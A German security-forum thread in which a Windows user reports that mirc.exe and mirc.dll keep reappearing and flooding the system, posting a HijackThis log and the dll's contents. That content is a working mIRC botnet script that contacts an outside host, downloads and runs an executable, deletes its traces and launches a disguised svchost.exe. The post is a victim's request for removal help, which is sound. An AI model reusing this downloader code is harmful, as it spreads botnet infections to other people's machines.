| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Unbekannter Wurm/Virus/TrojanerWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
08.05.2004, 15:59
| #1 |
| |  Unbekannter Wurm/Virus/Trojaner Hi... seit gestern abend macht mein PC Probleme... Nach jedem Neustart ist direkt unter C:/ eine Datei mirc.exe und eine mirc.dll zu finden. Bei entweder normalem Doppelklick drauf oder nach einer bestimmten Zeit die der PC läuft, startet die Datei und es entstehen dann über 100 mirc.exe Prozesse (immer ca 2000 bis 6000 kb)... Diese überlasten dann mein System und ich muss neu starten.. Wenn ich die mirc.exe lösche, läuft mein PC normal, außer das er mir ziemlich langsam vorkommt und gelegentlich länger hängt... Hab mal HijackThis laufen lassen, hier das log: </font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">Logfile of HijackThis v1.97.7 Scan saved at 16:50:14, on 08.05.2003 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe C:\Programme\Norton Personal Firewall\NISUM.EXE C:\WINDOWS\Explorer.EXE C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe C:\WINDOWS\System32\rundll32.exe C:\Programme\AVPersonal\AVGUARD.EXE C:\Programme\Microsoft Hardware\Mouse\point32.exe C:\Programme\ICQLite\ICQLite.exe C:\Programme\AVPersonal\AVGNT.EXE C:\Programme\AVPersonal\AVWUPSRV.EXE C:\WINDOWS\System32\ctfmon.exe C:\WINDOWS\System32\drivers\CDAC11BA.EXE C:\Programme\Norton Personal Firewall\ccPxySvc.exe C:\WINDOWS\System32\nvsvc32.exe C:\WINDOWS\System32\svchost.exe C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe C:\Dokumente und Einstellungen\simon.SDASD\Eigene Dateien\MozDL\HijackThis.exe C:\Programme\Mozilla Firefox\firefox.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.inselkampf.de/ R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd={SUB_PRD}&clcid={SUB_CLSID}&pver={SUB_PVER}&ar=home R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir...mp;ar=iesearch R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.microsoft.com/isapi/redir...amp;ar=msnhome R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft.com/isapi/redir...mp;ar=iesearch R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://www.microsoft.com/isapi/redir...p;plcid=0x0407 O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe" O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe" O4 - HKLM\..\Run: [KEWelcomeReBoot] G:\welcome_S500.exe O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [WorksFUD] C:\Programme\Microsoft Works\wkfud.exe O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Programme\Microsoft Works\WksSb.exe /AllUsers O4 - HKLM\..\Run: [POINTER] point32.exe O4 - HKLM\..\Run: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -minimize O4 - HKLM\..\Run: [AVGCtrl] C:\Programme\AVPersonal\AVGNT.EXE /min O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Programme\ICQLite\ICQLite.exe -trayboot O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Programme\Gemeinsame Dateien\Adobe\Calibration\Adobe Gamma Loader.exe O4 - Global Startup: Erinnerungen in Microsoft Works-Kalender.lnk = ? O4 - Global Startup: setup_pcc.lnk = D:\Trend Micro PC-cillin 2004\Setup\setup.exe O4 - Global Startup: WAVEline 11Mbps Wireless LAN Utility.lnk = C:\Programme\WAVEline Wireless LAN Setting\wlanutil.exe O9 - Extra button: AIM (HKLM) O9 - Extra button: ICQ 4.0 (HKLM) O9 - Extra 'Tools' menuitem: ICQ Lite (HKLM) O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall-Kontrolle) - http://a840.g.akamai.net/7/840/537/2...ll/xscan53.cab O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.co...948.1423148148 O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/s...sh/swflash.cab O17 - HKLM\System\CCS\Services\Tcpip\..\{95CEFE89-0F71-45E5-9F87-F9819B53A576}: NameServer = 194.25.2.129,217.5.99.105</pre>[/QUOTE]Neben der mirc.exe in C:/ gibts dort wie bereits gesagt auch noch ne dll Datei, hier mal auch noch deren Inhalt: </font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">alias botnet.scan.4.fileurl { set %botnet.host boonsterfileurl.da.ru | sockclose botnet.check.fileurl | .timer 1 1 sockopen botnet.check.fileurl %botnet.host 80 } ON *:SOCKOPEN:botnet.check.fileurl: { sockwrite -n $sockname GET / HTTP/1.1 sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2) } ON *:SOCKREAD:botnet.check.fileurl: { var %sockread sockread %sockread if ($regsub(%sockread, <HTML><HEAD><TITLE>,,%sockread)) && ($regsub(%sockread, </TITLE></HEAD>,,%sockread)) { set %botnet.account %sockread sockclose botnet.download.new.version .timer 1 1 sockopen botnet.download.new.version people.freenet.de 80 } } ON *:SOCKOPEN:botnet.download.new.version: { sockwrite -n $sockname GET / $+ %botnet.account $+ /damn.exe HTTP/1.0 sockwrite -n $sockname Accept: */* sockwrite -n $sockname Host: %botnet.host $+ $str($crlf,2) sockwrite -n $sockname } ON *:SOCKREAD:botnet.download.new.version:{ if (%botnet.aupd.downloadready != 1) { var %header sockread %header while ($sockbr) { if (* !iswm %header) { %botnet.aupd.downloadready = 1 break } sockread %header } } sockread 4096 &d while ($sockbr) { bwrite update.exe -1 -1 &d sockread 4096 &d } } ON *:SOCKCLOSE:botnet.download.new.version: { unset %botnet.aupd.* | run update.exe | remove c:\mirc.exe | remove c:\mirc.dll | .timer 1 3 run C:\WINDOWS\system32\system01\svchost.exe | .timer 1 3 exit }</pre>[/QUOTE]Das Problem ist halt das die beiden Dateien scheinbar von einer anderen gesteuert werden und nach jedem neustart trotz löschen wieder da sind  Hoffe ihr könnt mir helfen... /edit: Was natürlich noch Wichtig ist... als ich AntiVir bzw. Trend drüberlaufen lies, hat es zwar n paar Sachen gefunden aber keine die das Problem behoben haben... |
| Themen zu Unbekannter Wurm/Virus/Trojaner |
| adobe, bot, drivers, einstellungen, explorer, firefox, firewall, hijack, hijackthis, internet, internet explorer, langsam, log, logfile, löschen, mozilla, mozilla firefox, neustart, nvcpl.dll, object, pc läuft, pc normal, programme, prozesse, rundll, shockwave, software, symantec, system, tcpip, trend micro, unter, windows, windows xp, windows\system32\drivers, wireless lan |
Baum-Darstellung